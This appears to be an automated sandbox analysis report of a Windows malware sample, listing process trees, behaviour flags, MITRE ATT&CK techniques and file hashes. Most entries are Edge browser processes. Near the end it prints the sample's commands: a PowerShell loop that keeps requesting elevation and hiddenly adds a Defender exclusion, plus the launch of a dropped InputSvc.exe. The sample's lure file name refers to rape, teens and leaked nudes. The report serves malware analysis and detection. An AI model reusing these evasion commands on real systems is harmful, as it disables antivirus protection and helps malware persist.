C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe1ff746f8,0x7ffe1ff74708,0x7ffe1ff747182⤵PID:1508
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2072 /prefetch:22⤵PID:3224
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:1644 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2736 /prefetch:82⤵PID:1360
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:12⤵PID:748
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:12⤵PID:4960
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5320 /prefetch:82⤵PID:848
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5320 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3484 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5388 /prefetch:12⤵PID:4044
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5384 /prefetch:12⤵PID:4144
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5576 /prefetch:82⤵PID:4708
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5588 /prefetch:12⤵PID:3492
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4656 /prefetch:12⤵PID:3140
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4752 /prefetch:12⤵PID:532
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3412 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3812 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:12⤵PID:5216
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4568 /prefetch:12⤵PID:5388
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=2896 /prefetch:82⤵PID:4844
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=1892 /prefetch:82⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:4896 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3636 /prefetch:12⤵PID:2236
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2508 /prefetch:12⤵PID:4100
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5848 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5676 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5460 /prefetch:12⤵PID:3888
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1880 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:3716 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5608 /prefetch:82⤵PID:428
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4128 /prefetch:12⤵PID:5448
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3580 /prefetch:12⤵PID:5624
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3360 /prefetch:12⤵PID:5216
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1288 /prefetch:82⤵PID:4956
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6684 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5592 -
C:\Users\Admin\Downloads\winrar-x64-701.exe"C:\Users\Admin\Downloads\winrar-x64-701.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2236 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4148 /prefetch:12⤵PID:1924
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1892 /prefetch:12⤵PID:6020
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5592 /prefetch:12⤵PID:5688
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6100 /prefetch:12⤵PID:3256
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3452 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4028 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4660 /prefetch:22⤵
- Suspicious behavior: EnumeratesProcesses
PID:5780 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5312 /prefetch:12⤵PID:5668
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4864 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:4944 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5784 /prefetch:82⤵PID:2508
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5636 /prefetch:12⤵PID:5360
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6708 /prefetch:12⤵PID:5124
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5996 /prefetch:12⤵PID:5636
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:1804 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:12⤵PID:5436
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6992 /prefetch:12⤵PID:3768
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2052,6698988039802127915,6420470645242080951,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4904 /prefetch:12⤵PID:5700
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:4596
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3100
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5384 -
C:\Program Files\VideoLAN\VLC\vlc.exe"C:\Program Files\VideoLAN\VLC\vlc.exe" --started-from-file "C:\Users\Admin\Downloads\c95482.rar"2⤵
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:5492
-
C:\Windows\system32\taskmgr.exe"C:\Windows\system32\taskmgr.exe" /41⤵
- Loads dropped DLL
- Checks SCSI registry key(s)
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SendNotifyMessage
PID:5756
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:2808
-
C:\Users\Admin\Downloads\winrar-x64-701.exe"C:\Users\Admin\Downloads\winrar-x64-701.exe"1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5560
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap24871:74:7zEvent319441⤵
- Suspicious use of AdjustPrivilegeToken
PID:4636
-
C:\Users\Admin\Downloads\Porn Link Pack Full Of CNC Legal Rape Barley Legal Teens Milfs Leaked Snapchat Nudes and all.pif"C:\Users\Admin\Downloads\Porn Link Pack Full Of CNC Legal Rape Barley Legal Teens Milfs Leaked Snapchat Nudes and all.pif"1⤵
- Enumerates VirtualBox DLL files
- Looks for VirtualBox drivers on disk
- Looks for VirtualBox executables on disk
- Looks for VMWare drivers on disk
- Executes dropped EXE
- Adds Run key to start application
PID:1032 -
C:\Windows\System32\Wbem\wmic.exewmic os get Caption2⤵
- Suspicious use of AdjustPrivilegeToken
PID:5516 -
C:\Windows\system32\cmd.execmd /C "PowerShell.exe -Command while($true){try{Start-Process \"cmd.exe\" -Verb runas -ArgumentList \"/c\", 'cmd.exe /c start /min powershell -WindowStyle hidden -Command Add-MpPreference -ExclusionPath \"C:\Users\Admin\AppData\Local\WindowsInputSvc\"';exit}catch{}}"2⤵PID:3212
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell.exe -Command while($true){try{Start-Process \"cmd.exe\" -Verb runas -ArgumentList \"/c\", 'cmd.exe /c start /min powershell -WindowStyle hidden -Command Add-MpPreference -ExclusionPath \"C:\Users\Admin\AppData\Local\WindowsInputSvc\"';exit}catch{}}3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:5888 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd.exe /c start /min powershell -WindowStyle hidden -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\WindowsInputSvc"4⤵PID:1208
-
C:\Windows\system32\cmd.execmd.exe /c start /min powershell -WindowStyle hidden -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\WindowsInputSvc"5⤵PID:5328
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle hidden -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\WindowsInputSvc"6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious use of AdjustPrivilegeToken
PID:6072 -
C:\Windows\system32\cmd.execmd /C "start C:\Users\Admin\AppData\Local\WindowsInputSvc\InputSvc.exe"2⤵PID:456
-
C:\Users\Admin\AppData\Local\WindowsInputSvc\InputSvc.exeC:\Users\Admin\AppData\Local\WindowsInputSvc\InputSvc.exe3⤵
- Enumerates VirtualBox DLL files
- Looks for VirtualBox drivers on disk
- Looks for VirtualBox executables on disk
- Looks for VMWare drivers on disk
- Executes dropped EXE
- Modifies system certificate store
PID:4504
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SDRSVC1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2460
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" "https://www.bing.com/search?q=t4pfwd.exe t4pfwd.exe"1⤵PID:6040
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffe1ff746f8,0x7ffe1ff74708,0x7ffe1ff747182⤵PID:5712
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Modify Registry
2Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD56cf293cb4d80be23433eecf74ddb5503
SHA124fe4752df102c2ef492954d6b046cb5512ad408
SHA256b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8
SHA5120f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00
-
Filesize
152B
MD5537815e7cc5c694912ac0308147852e4
SHA12ccdd9d9dc637db5462fe8119c0df261146c363c
SHA256b4b69d099507d88abdeff4835e06cc6711e1c47464c963d013cef0a278e52d4f
SHA51263969a69af057235dbdecddc483ef5ce0058673179a3580c5aa12938c9501513cdb72dd703a06fa7d4fc08d074f17528283338c795334398497c771ecbd1350a
-
Filesize
152B
MD58b167567021ccb1a9fdf073fa9112ef0
SHA13baf293fbfaa7c1e7cdacb5f2975737f4ef69898
SHA25626764cedf35f118b55f30b3a36e0693f9f38290a5b2b6b8b83a00e990ae18513
SHA512726098001ef1acf1dd154a658752fa27dea32bca8fbb66395c142cb666102e71632adbad1b7e2f717071cd3e3af3867471932a71707f2ae97b989f4be468ab54
-
Filesize
4.1MB
MD5de5d4c61f0017583997b7902ddc58e2e
SHA1b594f4e3ce549c848ee61dafdf78a1911dcd42f4
SHA25641eb6ff7c6d5cf52293d5f3f9cddb08c0b42f308087aefdd04d079618eb457b0
SHA5123f89322f58e5db481cb3eb46a78366baa755f70439c2a96cd5c1cbb87de986c40859a8f71abfccbd4e660d64a3fd506fbec99881a7dda217b6217f3afc9a42ba
-
Filesize
36KB
MD529275fefce2934df742efb191686aa38
SHA1a0480736da9dea050409dd49396303c6db12cd26
SHA2563535e041511aa95b037d0680b00e0d7cd309cbe8af0ce1dc093b0301020f1841
SHA512b3a969ac8cca8f128de3a0e0075a0f4a863b96d56bdbe4f3737311db7e82bc6048ac7969158e9a50acc3685bf6e5eddcc3b45bde99ad375a76a96e4dda4e4c53
-
Filesize
62KB
MD5c3c0eb5e044497577bec91b5970f6d30
SHA1d833f81cf21f68d43ba64a6c28892945adc317a6
SHA256eb48be34490ec9c4f9402b882166cd82cd317b51b2a49aae75cdf9ee035035eb
SHA51283d3545a4ed9eed2d25f98c4c9f100ae0ac5e4bc8828dccadee38553b7633bb63222132df8ec09d32eb37d960accb76e7aab5719fc08cc0a4ef07b053f30cf38
-
Filesize
69KB
MD5aac57f6f587f163486628b8860aa3637
SHA1b1b51e14672caae2361f0e2c54b72d1107cfce54
SHA2560cda72f2d9b6f196897f58d5de1fe1b43424ce55701eac625e591a0fd4ce7486
SHA5120622796aab85764434e30cbe78b4e80e129443744dd13bc376f7a124ed04863c86bb1dcd5222bb1814f6599accbd45c9ee2b983da6c461b68670ae59141a6c1a
-
Filesize
39KB
MD5cd1f47da2575e2b93805c9a5d289b995
SHA1f4c2fd1e99bfb831523f36377559ccddf8cc8df3
SHA256fa0b04f90f25bf3aecdb0ee74f5f76c4119adbb4a019fc3fb70bcb5b496b4ddc
